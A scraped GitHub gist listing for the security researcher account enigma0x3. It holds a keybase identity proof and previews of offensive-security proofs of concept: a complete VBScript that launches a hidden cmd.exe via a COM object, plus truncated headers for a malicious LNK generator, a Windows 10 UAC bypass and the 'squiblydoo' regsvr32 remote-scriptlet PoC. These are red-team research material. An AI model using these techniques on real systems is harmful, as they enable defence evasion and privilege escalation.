I hereby claim:
- I am enigma0x3 on github.
- I am enigma0x3 (https://keybase.io/enigma0x3) on keybase.
- I have a public key whose fingerprint is ACA2 EE69 66CD 2383 F8CF 98E7 BD02 7173 DFDC DF56
To claim this, I am signing this object:
Matt Nelson enigma0x3
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script language="VBScript"> | |
| Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880") | |
| obj.Document.Application.ShellExecute "cmd.exe",Null,"C:\Windows\System32",Null,0 | |
| self.close | |
| </script> |
enigma0x3
/ Create-LNK.ps1
Created
January 5, 2017 15:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Create-LNKPayload{ | |
| <# | |
| .SYNOPSIS | |
| Generates a malicous LNK file | |
| .PARAMETER LNKName | |
| Name of the LNK file you want to create. |
enigma0x3
/ UACBypass.ps1
Created
October 18, 2016 15:30
— forked from mattifestation/UACBypass.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-UACBypass { | |
| <# | |
| .SYNOPSIS | |
| Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
| Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |
enigma0x3
/ Backdoor-Minimalist.sct
Last active
March 9, 2025 06:49
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
enigma0x3
/ keybase.md
Created
May 5, 2015 15:28
NewerOlder